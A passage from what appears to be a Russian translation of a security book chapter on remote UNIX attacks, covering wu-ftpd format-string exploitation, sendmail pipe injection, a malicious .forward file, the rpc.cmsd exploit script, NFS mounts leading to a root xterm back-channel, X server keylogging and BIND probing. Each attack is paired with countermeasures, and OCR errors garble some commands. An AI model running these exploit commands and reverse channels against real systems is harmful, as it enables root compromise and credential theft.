    Oxbfffb028, Shellcode: 152
    loggin into system.
    USER ftp
    331 Guest login ok, send your complete e-mail address as password.
    PASS <shellcode>
    230-Next time please use your e-mail address as your password
    230-for example: joe@thunder
    230 Guest login ok, access restrictions apply.
    STEP 2 : Skipping, magic number already exists:
    [87,01:03,02:01,01:02,04]
    STEP 3 : Checking if we can reach our
    return address by format string
    STEP 4 : Ptr address test: Oxbfffb028
    (if it is not Oxbfffb028 ^С
    me now)
    STEP 5 : Sending code.,
    this will take about 10 seconds. Press ^\
    to leave shell
    Linux shadow 2.2.14-5.0
    #1 Tue Mar 7 21:07:39 EST 2000 1686 unknown
    uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

    Подобная атака оказывается поистине смертельной. Анонимного доступа к уязвимому FTP-серверу, который поддерживает выполнение определенных команд, вполне достаточно, чтобы получить доступ с правами root.
    Еще один изъян в системе безопасности, обнаруженный в системе BSD еще в 1993 году, связан с демоном ftpd. Его описание можно найти по адресу http://www.cert.org/advisories/CA-2000-13.html.
    Хотя в данной книге этот вопрос подробно рассматриваться не будет, помните о том, что наличие подобного изъяна также может оказаться достаточно опасным.

    Контрмеры: защита FTP



    Хотя протокол FTP очень полезен, необходимо помнить, что разрешение анонимного доступа к FTP-серверу может весьма пагубно сказаться на "самочувствии" вашего сервера. Оцените необходимость использования FTP-сервера и определите, нужно ли предоставлять возможность анонимного доступа. В таких случаях для защиты сервера необходимо предпринять специальные меры. Очень важно установить самые последние версии модулей обновления, а также запретить или как минимум oipami-чить количество каталогов, в которые разрешена запись всем пользователям. А лучше вовсе откажитесь от таких каталогов.

    sendmail



    Данная тема столь обширна, что вполне заслуживает отдельной книги. С чего же начать? Программа sendmail — это агент рассылки электронной почты (МТА — mail transfer agent), используемый во многих системах UNIX. Из всех программ UNIX sendmail, пожалуй, является самой "вредной". Она обладает очень широким набором функций, в связи с чем позволяет настраивать свои параметры самыми разными способами и является очень сложной в использовании. Фактически о первых попытках взлома sendmail стало известно еще в 1988 году и с тех пор ее использовали для получения несанкционированного доступа к нескольким тысячам систем. Одно время была даже популярной такая шутка: "Какая ошибка в sendmail признана лучшей ошибкой недели?" В течение последних лет sendmail была значительно улучшена в плане безопасности, но она по-прежнему остается очень большой программой, исходный код которой содержит более 80000 строк. Таким образом, вероятность обнаружения новых изъянов в системе зашиты по-прежнему достаточно велика.
    Как вы помните из главы 3, с помощью программы sendmail, а точнее ее команд vrfy и ехрп, можно идентифицировать пользовательские учетные записи. Это само по себе представляет угрозу, однако данная угроза — ничто по сравнению с той опасностью, которую таит в себе работающая программа sendmail. За десять последних лет в sendmail были выявлены целые россыпи изъянов защиты. К сожалению, необходимо констатировать, что список ее недостатков еще далеко не полон — несмотря на столь давний срок эксплуатации, в программе постоянно обнаруживаются новые и новые проблемы. Многие из этих проблем связаны с возникновением состояния переполнения буфера при удаленном подключении, а также с возможностью взлома при отсутствии проверки ввода. Одним из самых популярных методов взлома sendmail заключался в использовании недостатка sendmail 4.1, проявляющегося при перенаправлении ввода-вывода. Суть проблемы состояла в том, что взломщик с использованием конвейера мог направить программе sendmail команды для выполнения. При этом sendmail выполняла любую команду с привилегиями, которые применялись для программ, расположенных в каталоге bin.

    hello
    mail from: |
    rcpt to: bounce
    data
    mail from: bin
    rcpt to: | sed 4,/^$/d' | sh
    data

    Помимо универсальных методов, направленных на переполнение буфера или взлом при отсутствии проверки ввода, для получения несанкционированного доступа часто применяются средства, специфичные для sendmail. Например, одним из распространенных методов является создание или модификация пользовательского файла -/.forward с применением FTP или NFS при условии, конечно, что у взломщика имеется доступ для записи в рабочий каталог этого пользователя. В файле -/.forward обычно содержатся сведения о том, куда нужно перенаправлять почтовые сообщения или какие программы нужно запускать при ее поступлении. Очевидно, что для взломщика этот файл представляет собой "лакомый кусочек", а его модификация открывает перед злоумышленником весьма богатые возможности. Давайте рассмотрим пример того, что взломщик может добавить в файл ~/.forward выбранной им жертвы.

    [tsunami]$ cat > .forward
    |"op /bin/sh /home/gk/evil_shell ;
    chmod 755 /home/gk/evil_shell"
    <crtl> D

    [tsunami]$ cat .forward
    I"cp /bin/sh /home/gk/evil_shell ;
    chmod 755 /home/gk/evil_shell"

    Создав такой файл, взломщик помещает его в соответствующий пользовательский каталог взламываемой системы (естественно, при условии, что у него имеется право записи в этот каталог). Затем ему остается лишь отправить почту по адресу жертвы. [tsunami]$ echo hello chump | mail gk@targetsystem.com
    Получение сообщения приведет к созданию в рабочем каталоге пользователя файла evil_shell. При запуске этого файла будет запущена командная оболочка с привилегиями, соответствующими уровню привилегий использованной взломщиком учетной записи.

    Контрмеры: защита программы sendmail



    Лучшим методом защиты от попыток взлома sendmail является отказ от ее использования во всех случаях, когда эта программа не используется для получения почты по сети. Если использовать sendmail все же необходимо, обязательно убедитесь в том, что в вашем распоряжении имеется ее самая свежая версия, в которой установлены все модули обновления системы защиты (http://www.sendmail.org). К другим мерам относится удаление из соответствующего файла всех псевдонимов. Исследуйте каждый псевдоним, который указывает на программу, а не на учетную запись пользователя. Кроме того, убедитесь, что разрешения, заданные для соответствующих файлов, запрещают внесение в них каких-либо изменений.
    Существуют дополнительные утилиты, призванные восполнить недостаточную защищенность sendmail. Такими утилитами, например, являются smap и smapd — программы, входящие в комплект поставки пакета TIS, который можно бесплатно получить по адресу http://www.tis.com/research/software. Утилита smap используется для безопасного получения сообщений по сети и их размещения в специально выделенном каталоге. Утилита smapd периодически проверяет этот каталог и доставляет почту адресатам, используя для этого sendmail или какую-либо другую программу. Данный подход позволяет разорвать связь между sendmail и нелегальными пользователями, поскольку все соединения для получения почты устанавливает утилита smap, а не sendmail. Наконец, можно перейти к использованию более надежного агента МТА, такого как qmail. Программа qmail, написанная Дэном Бернштейном (Dan Bernstein),
    представляет собой современный эквивалент sendmail. Одной из основных целей создания программы qmail было обеспечение безопасности при работе с электронной почтой, и в настоящее время она пользуется очень хорошей репутацией (подробнее см. по адресу http://www.qmail.org).
    Кроме вышеупомянутых изъянов, программа sendmail зачастую неправильно конфигурируется, что позволяет с ее помощью рассылать спэмы. В программе sendmail версии 8.9 и выше реализованы функции, предотвращающие ее использование для таких целей. Для того чтобы получить об этом более подробную информацию и защитить узел от атак спэмеров, обратитесь по адресу http://www.sendmail.org/tips/relaying.html.

    Службы удаленного вызова процедур (RPC)



    Удаленный вызов процедур (RPC — Remote Procedure Call) — это механизм, который позволяет программе, работающей на одном компьютере, выполнять программный код на удаленном компьютере. Одна из первых реализаций службы RPC была разработана компанией Sun Microsystems и использовалась в системе, базирующейся на протоколе XDR (внешнее представление данных — eXtemal Data Representation). Целью этой системы было обеспечение взаимодействия сетевой информационной службы (NIS — Network Information System) и сетевой файловой системы (NFS — Network File System), созданных компанией Sun. После разработки компанией Sun Microsystems службы RPC многие другие производители операционных систем семейства UNIX также стали включать поддержку RPC в свои продукты. С точки зрения обеспечения взаимодействия распространение и стандартизация RPC — это очень важно и полезно. Однако при разработке службы RPC вопросам безопасности практически не уделялось никакого внимания. Несмотря на то что и компания Sun, и другие разработчики приложили все усилия, для того, чтобы устранить имеющиеся недостатки в уже используемом программном обеспечении и выпустить соответствующие модули обновления, нередко оказывается, что механизм RPC по-прежнему таит в себе немало проблем, связанных с огромным количеством ошибок в системе защиты.
    Как уже отмечалось в главе 3, при запуске службы RPC регистрируются с помощью службы преобразования портов (portmapper). Для того чтобы установить связь со службой RPC, у службы portmapper необходимо запросить номер порта RPC. Ранее уже рассматривался метод получения списка запущенных служб RPC, заключающийся в сканировании портов с использованием утилиты rpcinfo или параметра -n (если служба portmapper блокируется на уровне брандмауэра). К сожалению, во многих версиях UNIX после загрузки по умолчанию включается режим поддержки RPC. Но это еще полбеды — настоящая проблема состоит в том, что многие службы RPC очень сложны и работают на уровне привилегий суперпользователя root. Таким образом, успешный взлом путем переполнения буфера или при отсутствии проверки ввода приведет к немедленному получению доступа в качестве суперпользователя. На момент написания данной книги взлому путем переполнения буфера были наиболее подвержены службы rpc. ttdbserverd (http: //www. cert.org/advisories/CA-98.11.tooltalk.html) И rpc.cmsd (http://www.cert. org/advisories/CA-99-08-cmsd.html), являющиеся частью стандартного рабочего стола (Common Desktop Environment — CDE). Поскольку обе службы работают на уровне привилегий суперпользователя, взломщику достаточно вызвать состояние переполнения буфера и создать обратный канал, воспользовавшись программой xterm либо установив реверсивный telnet-сеанс. К другим не менее опасным службам RPC относятся rpc. statd (http://www.cert.org/advisories/CA-99-05-statd-automountd.html) и rpc.mountd, которые оказываются активными при использовании сетевой файловой системы NFS (см. раздел "Nfs" ниже в этой главе). Даже если служба преобразования портов заблокирована, взломщик может вручную просканировать порты и попытаться выявить активные службы RPC (с помощью параметра -sR утилиты nmар), с которыми обычно связаны порты с большими номерами. Вышеупомянутые службы представляют собой лишь несколько примеров проблем, которые может создать поддержка механизма RPC. Благодаря распределенной природе служб RPC и высокой сложности их компонентов, этот механизм часто является жертвой злоумышленников, что и продемонстрировано в следующем фрагменте.

    [rumble]* cmsd.sh quake
    192.168.1.11 2 192.168.1.103

    Executing exploit...
    rtable_create worked
    clnt__call[rtable_insert]: RPC:
    Unable to receive; errno=Connection
    reset
    by peer

    Как показано ниже, эту атаку позволяет упростить простой сценарий оболочки, в котором вызывается утилита cmsd. При этом необходимо знать имя удаленного узла. В рассматриваемом примере таким именем является quake. Кроме того, используется также IP-адрес этого узла, 192.168.1.11, а также тип системы (2), что эквивалентно системе Solaris 2.6. Эта информация оказывается чрезвычайно важной, поскольку утилита "приспосабливается" к каждой конкретной системе. И наконец, мы указали также IP-адрес компьютера взломщика (192 .168 .1.103) и установили обратный канал с использованием программы xterm (рис. 8.2).



    Рис. 8.2. Окно xterm, появившееся в результате использования утилиты cmsd. Этого же результата можно достигнуть при использовании служб rpc. ttdbserverd или rpc. statd

    #!/bin/sh
    if [ $# -It 4 ]; then

    echo "Rpc.cmsd buffer overflow for
    Solaris 2.5 & 2.6 7"
    echo "If rpcinfo -p target_ip 1grep
    100068 = true - you win!"
    echo "Don't forget to xhost+ the target system"
    echo ""
    echo "Usage: $0 target_hostname target_ip <
    0/S version (1-7)> your_ip"
    exit 1
    fi
    echo "Executing exploit..."
    cmsd -h $1 -c "/usr/openwin/bin/xterm -display
    $4:0.0 &" $3 $2

    Контрмеры: защита служб RFC



    Лучшим методом защиты от удаленных атак является отключение всех служб RPC, в использовании которых нет острой необходимости. Если же какая-то служба RPC очень важна для работы сервера, подумайте над установкой какого-либо устройства управления доступом, с помощью которого связь с необходимыми портами RPC можно было бы разрешить только строго определенным узлам. В некоторых случаях эта задача может оказаться весьма непростой. Подумайте также над включением режима, запрещающего выполнение стека, если такой режим поддерживается вашей операционной системой. Наконец. попробуйте использовать Secure RPC, если имеющаяся в вашем распоряжении версия UNIX поддерживает такие средства. Secure RPC обеспечивает дополнительный уровень аутентификации, основанной на шифровании по открытому ключу. Помните, что Secure RPC — это не панацея, поскольку многие разработчики UNIX не поддерживают этого протокола. Другими словами, при использовании протокола Secure RPC повышается безопасность, но под угрозой может оказаться взаимодействие. Наконец, убедитесь в том, что установлены все самые последние модули обновления, разработанные поставщиком используемой вами системы.

    NFS



    В документах компании Sun Microsystems можно встретить такое определение: "Сеть — это и есть компьютер". Действительно, возможности компьютера, не подключенного к сети, гораздо уже, чем его собрата, включенного в локальную или глобальную сеть. Возможно, именно из-за этого сетевая файловая система (NFS — Network File System) является одной из самых популярных файловых систем, предназначенных для поддержки сетевой обработки данных. Система NFS обеспечивает пользователям и приложениям прозрачный доступ к файлам и каталогам удаленных систем, как если бы эти файлы и каталоги были локальными. NFS была разработана компанией Sun Microsystems, и за годы, прошедшие после выхода версий 1 и 2, была значительно усовершенствована. В настоящее время система NFS версии 3 используется в большинстве современных клонов UNIX. Именно поэтому администратор любой системы, разрешающей удаленный доступ к экспортируемой файловой системе, должен быть особенно бдительным. Вероятность использования системы NFS для проникновения в сеть очень высока, а нарушения такого рода являются одними из самых распространенных нарушений безопасности UNIX. Это связано, во-первых, с -тем, что в сервере NFS (mountd) уже выявлено очень много потенциальных ошибок, приводящих к переполнению буфера. Кроме того, системой NFS используются службы RPC, что позволяет взломщикам смонтировать удаленную файловую систему. Большинство проблем, связанных с безопасностью NFS, имеет то или иное отношение к объектам, называемым дескрипторами файлов (file handle). Дескрипторы файлов — это уникальные маркеры, предназначенные для идентификации файлов и каталогов удаленного сервера. Если взломщику удастся выведать или подобрать дескриптор удаленного файла, он сможет легко получить к нему доступ.
    Чаще всего проблемы с системой NFS связаны с ее неправильной настройкой, когда экспортирование файловой системы разрешено любому пользователю (everyone). Иными словами, любой удаленный пользователь может смонтировать файловую систему, не проходя аутентификации. Эта проблема относится к разряду тех, которые возникают из-за лени или халатности некоторых администраторов и встречаются сплошь и рядом. Взломщику даже не нужно взламывать такую удаленную систему — все что требуется, это смонтировать файловую систему с помощью средств NFS и найти любой интересующий его файл. Обычно можно экспортировать рабочие каталоги пользователей так, что с помощью удаленного доступа можно получить множество интересных файлов (например, целые базы данных). Более того, экспортируется даже корневой каталог, о последствиях чего даже не нужно говорить! Давайте рассмотрим один пример, а затем рассмотрим инструменты, с помощью которых из системы NFS можно извлечь дополнительную пользу.
    Итак, проверим интересующую нас систему и определим, используется ли в ней система NFS и какие файловые системы экспортируются (если таковые имеются, конечно).

    [tsunami]# rpcinfo -p quake
    program vers proto port
    100000 4 tcp 111 rpcbind
    100000 3 tcp 111 rpcbind
    100000 2 tcp 111 rpcbind
    100000 4 udp 111 rpcbind
    100000 3 udp 111 rpcbind
    100000 2 udp 111 rpcbind
    100235 1 tcp 32771
    100068 2 udp 32772
    100068 3 udp 32772
    100068 4 udp 32772
    100068 5 udp 32772
    100024 1 udp 32773 status
    100024 1 tcp 32773 status
    100083 1 tcp 32772
    100021 1 udp 4045 nlockmgr
    100021 2 udp 4045 nlockmgr
    100021 3 udp 4045 nlockmgr
    100021 4 udp 4045 nlockmgr
    100021 1 tcp 4045 nlockmgr
    100021 2 tcp 4045 nlockmgr
    100021 3 tcp 4045 nlockmgr
    100021 4 tcp 4045 nlockmgr
    300598 1 udp 32780
    300598 1 tcp 32775
    805306368 1 udp 32780
    805306368 1 tcp 32775
    100249 1 udp 32781
    100249 1 tcp 32776
    1342177279 4 tcp 32777
    1342177279 1 tcp 32777
    1342177279 3 tcp 32777
    1342177279 2 tcp 32777
    100005 1 udp 32845 mountd
    100005 2 udp 32845 mountd
    100005 3 udp 32845 mountd
    100005 1 tcp 32811 mountd
    100005 2 tcp 32811 mountd
    100005 3 tcp 32811 mountd
    100003 2 udp 2049 nfs
    100003 3 udp 2049 nfs
    100227 2 udp 2049 nfs_acl
    1C0227 3 udp 2049 nfs_acl
    100003 2 tcp 2049 nfs
    100003 3 tcp 2049 nfs
    100227 2 tcp 2049 nfs_acl
    100227 3 tcp 2049 nfs_acl

    Обратившись к службе преобразования портов, на основе полученных результатов можно сделать вывод о том, что на удаленной системе запушены серверы NFS и mountd. Это означает, что данная система может экспортировать как минимум одну файловую систему.

    [tsunami]# showmount -е quake
    Export list for quake:
    / (everyone!
    /usr (everyone)

    Из результатов, полученных с помощью команды showmount, видно, что в рассматриваемом примере экспортируемыми является не только файловая система /usr, но и /, что связано с очень большим риском. Все, что нужно сделать взломщику для получения доступа к такой системе, — это воспользоваться командой mount / или mount /usr. После этого он получит доступ к любому файлу файловой системы / или /usr, в соответствии с разрешениями, заданными для файлов и каталогов. Команда mount входит в состав большинства клонов UNIX, хотя она оказывается и не такой гибкой, как некоторые другие средства. Для того чтобы познакомиться с особенностями использования команды mount более подробно, введите команду man mount, так как в некоторых случаях ее синтаксис может отличаться от того, который вы увидите в приведенном ниже примере.
    [tsunami /root]# mount quake:/ /mnt
    Другим, более удобным, инструментом исследования системы NFS является пакет nfsshell, разработанный Линдертом Ван Дорном (Leendert van Doom), которую можно найти по адресу ftp://ftp.cs.vu.nl/pub/leendert/nfsshell.tar.gz. В состав пакета nfsshell входит робастный клиент nfs. Этот клиент функционирует подобно клиенту FTP и позволяет легко манипулировать удаленной файловой системой. Многочисленные параметры nfs заслуживают того, чтобы привести их в данной книге.

    [tsunami n£s]# nfs
    nfs> help
    host <host> - установка имени удаленного узла
    uid [<uid> <secret-key>]] - установка идентификатора удаленного
    пользователя
    gid [<gid>] - установка идентификатора удаленной группы
    cd [<path>j - изменение рабочего каталога на удаленном узле
    led [<path>] - изменение рабочего каталога на локальном узле
    cat <filespec> - вывод на экран заданного файла
    Is -I <filespec> - просмотр содержимого удаленного каталога
    get <fiiespec> - получение удаленного файла
    df - информация о файловой системе
    rm <file> - удаление файла на удаленном узле
    in <filel> <f.ile2> - создание ссылки на файл
    rnv <filel> <file2> - перемещение файла
    mkdir <dir> - создание каталога на удаленном узле
    rmdir <dir> - удаление каталога на удаленном узле
    chmod <mode> <file> - изменение атрибутов файла
    chown <uid>[.<gid>] <file> - изменение владельца
    put. <Iccal-file> [<remote-file>] - отправка локального файла
    mount [-upTU] [-P port] <path> - монтирование файловой системы
    umount - демонтирование удаленной файловой системы
    umountall - демонтирование всех удаленных файловых систем
    export - просмотр списка всех экспортируемых файловых систем
    dump - просмотр всех смонтированных удаленных файловых систем
    status - вывод отчета о состоянии
    help - вывод данной информации
    quit - название говорит само за себя
    bye - good bye handle [<handle>] - просмотр/установка дескриптора файла каталога
    mknod <name> [b/c major minor] [p] - создание устройства

    Сначала нужно сообщить утилите nfs, файловую систему какого узла необходимо смонтировать.

    nfs> host quake
    Using a privileged port (1022)
    Open quake (192.168.1.10) TCP

    Затем посмотрим, какие файловые системы можно экспортировать.

    nfs> export
    Export list for quake:
    / everyone
    /usr everyone

    Теперь, чтобы получить доступ к файловой системе /, необходимо ее смонтировать.

    nfs> mount /
    Using a privileged port (1021)
    Mount '/', TCP, transfer size 8192 bytes

    Проверим состояние соединения и определим идентификатор UID, с которым была смонтирована файловая система.


    nfs> status
    User id : -2
    Group id :-2
    Remote host :'quake'
    Mount path :' / '
    Transfer size : 8192

    Итак, мы смонтировали файловую систему / с идентификаторами UID и GID, равными -2. Из соображений безопасности, если вы монтируете удаленную систему как суперпользователь root, ваши идентификаторы UID и GID подменяются другими значениями, отличными от 0. Поскольку мы смонтировали всю файловую систему, теперь без труда можно увидеть содержимое файла /etc/passwd.

    nfs> cd /etc
    nfs> cat passwd
    root:x:0:1:Super-User:/:/sbin/sh
    daemon:x:1:1::/:
    bin:x:2:2::/usr/bin:
    sys:x:3:3::/:
    adm:x:4:4:Admin:/var/adm:
    Ip:x:71:8:Line Printer Admin:/usr/spool/lp:
    smtp:x:0:0:Mail Daemon User:/:
    uucp:x:5:5:uucp Admin:/usr/lib/uucp:
    nuucp:x:9:9:uucp
    Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:Nobody: /:
    noaccess:x:60002:60002:No Access User:/:
    nobody4:x:65534:65534:SunOS 4.x Nobody:/:
    gk:x:1001:10::/export/home/gk:/bin/sh
    sm:x:lC03:10::/export/home/sm:/bin/sh

    Итак, теперь нам известны имена пользователей и соответствующие им идентификаторы. Однако файл паролей является скрытым (shadowed), поэтому им нельзя воспользоваться для взлома паролей. Поскольку мы не можем взломать ни одного пароля и, соответственно, не можем смонтировать файловую систему в качестве суперпользователя, необходимо определить другие идентификаторы пользователей, которые позволяют получить привилегированный доступ. Таким пользователем может оказаться daemon, но лучше всего остановить выбор на учетной записи bin. или UID 2, так как на многих системах пользователь bin является владельцем исполняемых файлов. Если взломщик сможет получить доступ к исполняемым файлам посредством системы NFS или каким-либо другим способом, то у большинства систем в таком случае не останется ни единого шанса на выживание. Затем нужно смонтировать систему /usr, изменить идентификаторы UID и GID, а затем попытаться получить доступ к исполняемым файлам. 

    nfs> mount /usr
    Using a privileged port(1022)
    Mount '/usr', TCP, transfer size 8192 bytes.
    nfs> uid 2
    nfs> gid 2
    nfs> status
    User id : 2
    Group id : 2
    Remote host: 'quake'
    Mount path : '/usr'
    Transfer size : 8192

    Теперь мы обладаем всеми привилегиями, которыми обладает пользователь bin на удаленной системе. В нашем примере файловая система не была экспортирована с какими-то специальными параметрами, которые ограничивали бы возможности пользователя bin по созданию или модификации файлов. Поэтому все, что осталось сделать, — это запустить программу xterm или создать обратный канал к нашей системе, который позволит получить доступ к взламываемой системе.
    Создадим на нашей системе следующий сценарий и сохраним его в файле in. f tpd.

    tt!/bin/sh
    /usr/openwin/bin/xterm -display 10.10.10.10:0.0 &

    Теперь нужно перейти в каталог /sbin удаленной системы и заменить исходный файл in. ftpd нашей версией.

    nfs> cd /sbin
    nfs> put in.ftpd

    И наконец, необходимо указать, чтобы удаленный сервер подключился к Х-серверу нашего узла с помощью команды xhost. Для этого нужно ввести следующие команды.

    [tsunami]# xhost +quake
    quake being added to access control list
    [tsunami]# ftp quake
    Connected to quake.

    В результате выполнения всех этих действий наша система станет X-терминалом удаленного узла с привилегиями root. Ввиду того что в этой системе файл in. ftpd вызывается из файла inetd с привилегиями суперпользователя, наш сценарий также будет выполнен с этими привилегиями, что означает получение доступа в качестве суперпользователя.

    # id
    uid=0{root)gid=0(root)
    #

    Контрмеры: защита системы NFS



    Если нет острой необходимости в использовании системы NFS, то ее, а также и все связанные с ней службы (например, mountd, statd и lockd) необходимо отключить. Реализуйте механизм управления доступом, который позволил бы получать доступ к нужным файлам только санкционированным пользователям. Обычно экспортом файловых систем и включением соответствующих параметров управления доступом управляют конфигурационные файлы /etc/exports, /etc/dfs/dfstab и т.д. Некоторые параметры управления доступом позволяют задать имена компьютеров или групп, которым разрешен доступ, установить доступ только для чтения или запретить установку флага SUID. В каждой реализации системы NFS имеются небольшие различия, поэтому более подробную информацию об используемой версии поищите в документации или в справочной системе. Кроме того, никогда не включайте локальный IP-адрес сервера (или localhost) в список систем, которым разрешено монтировать файловую систему. Более старые версии службы portmapper позволяют взломщикам подключаться через proxy-серверы, работающие в интересах этих взломщиков. Если системе было разрешено монтировать экспортируемую файловую систему, взломщики могут отправить пакеты NFS службе portmapper взламываемой системы, что, в свою очередь, приведет к пересылке запроса на localhost. Такой запрос будет выглядеть так, словно он поступил с доверенного узла, что позволит ему обойти соответствующие правила управления доступом. Как всегда, в качестве последней по порядку (но не по значимости!) меры, советуем установить все модули обновления, предлагаемые разработчиками программного обеспечения.

    Проблемы защиты системы X



    Система X Window предоставляет богатый набор функций, позволяющий многим программам одновременно использовать один и тот же графический дисплей. Но с точки зрения безопасности самой большой проблемой системы X Windows является реализованная в ней модель защиты, которую коротко можно охарактеризовать так: "Все или ничего". После того как клиент получил доступ к Х-серверу, ему выдается полная индульгенция. Клиенты X могут перехватывать нажатия клавиш на пользовательской консоли, закрывать окна, захватывать любые окна сервера и отображать их содержимое где угодно, и даже переключать клавиатуру на свою, независимо от того, какие клавиши нажимает пользователь. Многие проблемы основываются на слабой парадигме управления доступом или полном равнодушии системного администратора. Самой простой и популярной формой управления доступом к X является аутентификация с использованием команды xhost. Данный механизм обеспечивает управление доступом на основе IP-адреса и является при этом наиболее слабой формой аутентификации. Для удобства работы системный администратор может ввести команду xhost +, что позволит получить доступ к Х-серверу без какой-либо аутентификации любому локальному или удаленному пользователю (при использовании параметра + доступ к серверу разрешен для всех узлов). Что еще хуже, многие Х-серверы, работающие на платформе PC, по умолчанию настроены именно на использование команды xhost +, подвергая тем самым огромной опасности ничего не подозревающих пользователей. Как вы понимаете, этим, казалось бы незначительным, недостатком могут воспользоваться злоумышленники.
    Одной из лучших программ, предназначенной для идентификации Х-серверов, у которых включен режим xhost +, является утилита xscan. С ее помощью можно выполнить сканирование всей подсети, найти в ней открытые Х-серверы и записать все нажатия клавиш в файл журнала.

    [tsunami]$ xscan quake
    Scanning hostname quake ...
    Connecting to quake (192.168.1.10) on port 6000...
    Connected.
    Host quake is running X.
    Starting keyboard logging of host quake:0.0 to file KEYLOGquake:0.0...

    Теперь все клавиши, нажимаемые на клавиатуре удаленного компьютера, будут регистрироваться в файле KEYLOG.quake.

    [tsunami]$ tail -f KEYLOG.quake:0.0
    su -
    [Shift_L]Iamowned[Shift_R]!

    Затем достаточно воспользоваться командой tail, чтобы увидеть, что набирает на клавиатуре пользователь в режиме реального времени. В нашем примере пользователь ввел команду su, а затем, в ответ на приглашение, — пароль lamowned! (утилита xscan умеет даже определять нажатие клавиш <Shift>).
    Также просто определить, какие окна открыты на взломанной системе. Для этого взломщик сначала должен установить шестнадцатеричное значение идентификатора окна с помощью команды xlwins.

    [tsunami]! xlswins -display quake:0.0 Igrep -i netscape
    0x1000001 (Netscape)
    0x1000246 (Netscape)
    0x1000561 (Netscape: OpenBSD)

    Программа xlswins отображает много информации, поэтому в нашем примере мы используем утилиту grep, чтобы установить, запушен ли броузер Netscape. К счастью, нам повезло — броузер Netscape действительно запущен на удаленном компьютере. Однако ничего не мешает просмотреть все выдаваемые утилитой xlswins результаты и найти интересующие вас окна, не полагаясь на удачу. Теперь, для того чтобы увидеть окно Netscape на своем компьютере, мы воспользуемся программой XWatchWin, как показано на рис. 8.3. 
    [tsunami]# xwatchwin quake -w 0x1000561
    Указывая идентификаторы окон, можно просматривать их содержимое на своем компьютере, незаметно наблюдая за всеми действиями, которые выполняет пользователь.
    Даже если на взламываемом компьютере включен режим xhost -, взломщик может получить копию экрана консоли сеанса пользователя с помощью утилизы xwd. Для этого достаточно, чтобы у взломщика был локальный доступ к командной оболочке, а на взламываемом сервере использовалась лишь стандартная аутентификация xhost.
     [quake]$ xwd -root -display localhost:0.0 > dump.xwd
    Теперь, чтобы увидеть копию экрана, просто скопируйте файл на свой компьютер, воспользовавшись утилитой xwud.
     [tsunami]# xwud -in dump.xwd
    На этом перечень возможностей взломщика далеко не исчерпан. Он может, например, просто связать эмулятор клавиатуры KeySym с требуемым окном. После этого нажатия клавиш на клавиатуре злоумышленника будут отправляться программе xterm удаленной системы и обрабатываться так, как если бы они вводились на локальной клавиатуре этой системы.



    Рис. 8.3. С помощью утилиты XWatchWin можно удаленно просмотреть окно практически любого приложения рабочего стола

    Контрмеры: защита системы X



    Сделайте все возможное, чтобы избежать использования команды xhost +. He ленитесь, помните о безопасности! Если вы не можете пойти на столь радикальные меры, тогда хотя бы применяйте команду xhost -, которая запрещает новые подключения, однако позволяет функционировать уже имеющимся. Если вы должны разрешить удаленный доступ к вашему Х-серверу, обязательно указывайте IP-адрес каждого сервера, которому разрешен доступ. Никогда не забывайте о том, что любой пользователь такого сервера может скрытно подключиться к вашему Х-серверу. Среди других мер по обеспечению безопасности можно выделить применение более серьезного механизма аутентификации, такого как MIT-MAGIC-COOKIE-1, XDM-AUTHORIZATION-1 и MIT-KERBEROS-5. Эти механизмы обеспечивают довольно высокий уровень защиты при подключении к Х-серверу. Если вы используете программу xterm или аналогичный терминал, включите режим Secure Keyboard. Это позволит запретить любому процессу перехватывать нажатия клавиш. Кроме того, подумайте о том, чтобы блокировать доступ извне к портам 6000-6063 на уровне брандмауэра с целью запретить несанкционированным пользователям подключаться к портам Х-сервера. И наконец, воспользуйтесь защищенной оболочкой ssh и ее возможностями по повышению уровня защиты сеансов X. Убедитесь, что в файле sshd_config или sshd2_config для параметра ForwardXll установлено значение yes.

    Атаки на систему DNS



    DNS является одной из наиболее популярных служб, используемых в Internet и большинстве корпоративных интрасетей. Как и следовало ожидать, такое широкое распространение службы DNS оказалось одной из причин многочисленных атак на эту систему. Взломщики постоянно пытаются воспользоваться слабыми местами одной из наиболее стандартной реализации службы DNS системы UNIX— пакета BIND (Berkeley Internet Name Domain). Кроме того, DNS является одной из нескольких служб, которые практически всегда оказываются необходимыми и функционируют по всему периметру корпоративной сети, обеспечивая доступ к Internet. Таким образом, любая ошибка службы DNS практически всегда приводит к возможности удаленного проникновения (зачастую с привилегиями root). В одном из отчетов по вопросам безопасности, который был опубликован в 1999 году и взбудоражил общественное мнение, сообщалось, что более 50% всех соединенных с Internet серверов DNS уязвимы для атак взломщиков. Так что подобная опасность абсолютна реальна. Соблюдайте осторожность!
    Несмотря на то, что с пакетом BIND связано множество проблем обеспечения безопасности (http://www.cert.org/advisories/CA-98.05.bind_problems.html), мы сфокусируем все внимание на одной из последних и наиболее разрушительных атак. В ноябре 1999 года координационный центр CERT выпустил информационный бюллетень, в котором сообщалось о нескольких серьезных изъянах, обнаруженных в пакете BIND (http://www.cert.org/advisories/CA-99-14-bind.html). В Нем сообщалось о шести изъянах, среди которых наиболее опасным было удаленное переполнение буфера, возникающее при проверке пакетом BIND записей NXT. В результате переполнения буфера взломщик может выполнить на удаленном сервере любую команду с привилегиями root. Попробуем разобраться с основными принципами такой атаки.
    Для идентификации уязвимого сервера, на котором запущена программа named. большинство взломщиков прибегают к средствам автоматизации. Для того чтобы определить, имеются ли на вашем сервере DNS потенциально слабые места, необходимо провести дополнительную инвентаризацию.

    [ tsunami]# dig
    (§10.1.1.100 version.bind chaos txt

    «» DIG 8.1 «» 010.1.1.100 version.bind chaos txt
    (1 server found)
    res options: init recurs defnam dnsrch
    got answer:
    -»HEADER«- opcode: QUERY, status: NOERROR, id: 10
    flags: qr aa rd ra; QUERY: 1, ANSWER:
    1, AUTHORITY: 0, ADDITIONAL:
    QUERY SECTION:
    version.bind, type = TXT, class = CHAOS
    ANSWER SECTION: VERSION.BIND. OS CHAOS TXT"8.2.2"

    В приведенном фрагменте для определения используемой версии службы DNS демону named передается соответствующий запрос. Сейчас стоит еще раз подчерктть важность процесса предварительного сбора данных. В рассматриваемом примере на целевом сервере DNS используется программа named версии 8.2.2, которая уязвима для атак NXT. Для этой же атаки оказываются уязвимыми также версии 8.2 и 8.2.1 этой программы.
